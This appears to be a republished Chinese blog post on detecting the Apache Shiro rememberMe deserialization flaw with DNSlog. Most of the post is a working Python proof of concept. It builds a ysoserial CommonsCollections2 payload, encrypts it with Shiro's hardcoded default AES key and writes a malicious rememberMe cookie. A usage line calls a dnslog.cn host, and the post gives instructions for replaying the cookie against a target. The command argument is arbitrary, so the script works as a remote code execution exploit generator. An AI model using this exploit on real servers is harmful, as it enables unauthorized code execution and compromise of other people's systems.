Shiro反序列化漏洞检测dnslog

Posted Mysticbinary

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Shiro反序列化漏洞检测dnslog相关的知识,希望对你有一定的参考价值。


信息收集

poc

# pip install pycrypto
import sys
import base64
import uuid
from random import Random
import subprocess
from Crypto.Cipher import AES

def encode_rememberme(command):
    popen = subprocess.Popen([\'java\', \'-jar\', \'ysoserial-0.0.6-SNAPSHOT-BETA-all.jar\', \'CommonsCollections2\', command], stdout=subprocess.PIPE)
    BS   = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key  =  "kPH+bIxk5D2deZiIxcaaaA=="
    mode =  AES.MODE_CBC
    iv   =  uuid.uuid4().bytes
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext

if __name__ == \'__main__\':
    payload = encode_rememberme(sys.argv[1])    
    with open("/tmp/payload.cookie", "w") as fpw:
        print("rememberMe={}".format(payload.decode()), file=fpw)
python shiro_poc.py "sfvpil.dnslog.cn"

/tmp/payload.cookie

替换发包的rememberMe=X

参考

https://github.com/insightglacier/Shiro_exploit
https://github.com/Medicean/VulApps/tree/master/s/shiro/
https://www.cnblogs.com/paperpen/p/11312671.html

以上是关于Shiro反序列化漏洞检测dnslog的主要内容,如果未能解决你的问题,请参考以下文章

Shiro漏洞检测

验证Shiro反序列化漏洞反弹shell

JAVA代码审计之Shiro反序列化漏洞分析

【CVE-2016-4437】Shiro反序列化漏洞复现

漏洞实战Apache Shiro反序列化远程代码执行复现及“批量杀鸡”

关于Shiro反序列化漏洞的延伸—升级shiro也能被shell